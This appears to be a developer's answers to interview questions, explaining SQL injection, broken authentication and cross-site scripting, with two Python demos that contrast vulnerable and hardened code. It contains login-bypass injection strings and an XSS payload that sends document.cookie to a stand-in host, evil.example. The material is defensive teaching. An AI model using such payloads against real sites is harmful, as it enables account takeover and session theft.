“Clean Code”. It’s a very good book that helps programmers write efficient, high-quality code.
Tell me about a web application you have built. Why did you choose to build it? What did you learn? What challenges did you face and how did you overcome them?
I have built a web application called ‘Sport Catalog’. The application helps people store their sports equipment information in different sport categories. It was a required project for completing my Full Stack Web Developer nanodegree at the Udacity online school. I learned how to build a well-rounded web application from scratch and also how to deploy the app onto a Linux server and configure it. I faced some challenges while developing the app, such as unknown bugs and deployment issues, but I overcame them with patience and research. I also learned the importance of documentation in development, because it will help you in the long term.
List 2-3 attacks that web applications are vulnerable to. How do these attacks work? How can we prevent those attacks?
There are many types of user-input injection vulnerabilities, such as SQL injection or XML injection. In an SQL injection, attacker-controlled input is concatenated into the query text, so the input can change the existing query's logic (for example by closing the quoted string early and appending OR '1'='1', or a -- comment that removes the rest of the condition) in order to read, modify or destroy data. The primary way to prevent this class of attack is never to build queries by string concatenation: use parameterized queries (prepared statements) or an ORM that does so, so user input always travels as bound data and never as SQL. Input validation and sanitization are useful defense in depth, but they are not a substitute for parameterization; a vetted library such as bleach sanitizes HTML for display and does not protect a database query.
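The bypass described above, as an added example that is not part of the original answer. It uses Python's standard sqlite3 module against an in-memory database with one constructed user row; the function names, the table layout and the attack strings are all assumptions made for the demo. The vulnerable login pastes input into the query text, the hardened one binds it as parameters, and the same payloads succeed against the first and fail against the second:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a throw-away in-memory database with one constructed user row.

    The password is stored in plaintext only to keep the demo short; a real
    application stores a salted hash and compares against that instead.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Vulnerable: user input is interpolated straight into the SQL text."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened: the query text is fixed; input is passed as bound parameters."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


# Constructed attack inputs (hypothetical, for the demo only).
TAUTOLOGY = "' OR '1'='1"   # closes the quoted string, then makes the WHERE always true
COMMENT_OUT = "alice'--"     # closes the quoted string, comments out the password check

if __name__ == "__main__":
    conn = make_db()
    print("vulnerable, tautology password:", login_vulnerable(conn, "alice", TAUTOLOGY))   # True
    print("vulnerable, commented-out check:", login_vulnerable(conn, COMMENT_OUT, "wrong"))  # True
    print("safe, tautology password:      ", login_safe(conn, "alice", TAUTOLOGY))          # False
    print("safe, commented-out check:      ", login_safe(conn, COMMENT_OUT, "wrong"))         # False
```

With parameters bound, the database driver receives the attacker's string as a literal value to compare against the column, so the quote and the comment marker have no syntactic effect. The same rule applies whatever the database or framework: the SQL text must be constant and the data must arrive through the driver's parameter mechanism.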
The second kind of vulnerability, broken authentication, lets attackers capture or bypass the authentication methods that protect your application from unauthorized access. A common example is an unencrypted connection between client and server: anyone on the network path can read the traffic, capture credentials and session cookies, and replay or tamper with the data. The solution is to serve the whole application over HTTPS (TLS), which encrypts every request and response and authenticates the server, to redirect plain HTTP to HTTPS and send the Strict-Transport-Security header so browsers never fall back, and to mark session cookies Secure and HttpOnly so they are not sent in the clear or exposed to page scripts.
The third is cross-site scripting (XSS), which lets attackers inject JavaScript into a page served by a trusted site. Because the injected script runs in the victim's browser with the trusted site's origin, it can read session cookies and other credentials or perform actions as the logged-in user. For example, an attacker can spread a crafted link on social media; when the victim clicks it, the page renders the attacker's script, which can exfiltrate the session or redirect the victim to a page that pushes malware. The prevention is to treat all user-supplied content as data, not markup: escape output for the context it is rendered in (HTML body, attribute, JavaScript, URL), use a template engine that autoescapes by default, send a Content-Security-Policy header that disallows inline scripts, and mark session cookies HttpOnly so a successful injection cannot read them.
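The output-escaping point above, as an added example that is not part of the original answer. It uses only Python's standard html module; the function names, the comment and title fields, the hostname evil.example and the two payload strings are constructed for the demo. One pair of functions renders user text into the HTML body, the other into an attribute, and each is shown unescaped beside its escaped form:

```python
import html

# Constructed attacker inputs for the two rendering contexts below.
SCRIPT_PAYLOAD = "<script>fetch('https://evil.example/?c=' + document.cookie)</script>"
ATTR_PAYLOAD = '" onmouseover="alert(document.cookie)'


def render_comment_vulnerable(comment: str) -> str:
    """Vulnerable: user text is interpolated into the HTML body unescaped,
    so a <script> tag in the comment becomes a real script element."""
    return '<p class="comment">%s</p>' % comment


def render_comment_safe(comment: str) -> str:
    """Hardened: HTML-escape for the body context; < > & become entities
    and the browser shows the payload as text instead of running it."""
    return '<p class="comment">%s</p>' % html.escape(comment, quote=True)


def render_title_vulnerable(title: str) -> str:
    """Vulnerable: attribute context; a stray double quote ends the title
    attribute and lets the input add an event-handler attribute of its own."""
    return '<a href="/items" title="%s">link</a>' % title


def render_title_safe(title: str) -> str:
    """Hardened: quote=True also escapes " and ' to &quot; and &#x27;, which
    the attribute context needs in addition to < > & escaping."""
    return '<a href="/items" title="%s">link</a>' % html.escape(title, quote=True)


if __name__ == "__main__":
    print(render_comment_vulnerable(SCRIPT_PAYLOAD))
    print(render_comment_safe(SCRIPT_PAYLOAD))
    print(render_title_vulnerable(ATTR_PAYLOAD))
    print(render_title_safe(ATTR_PAYLOAD))
```

Escaping is context-specific: html.escape is correct for HTML body and quoted attribute values, but text placed inside a script block or a URL needs the encoding for that context instead. Template engines such as Jinja2 with autoescaping on apply the body/attribute escaping for you, so the manual calls here stand in for what the template layer should be doing on every render.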
If you were to start your full-stack developer position today, what would be your goals a year from now?
Learning something new every day, sharing my experience with the community and having fun hacking.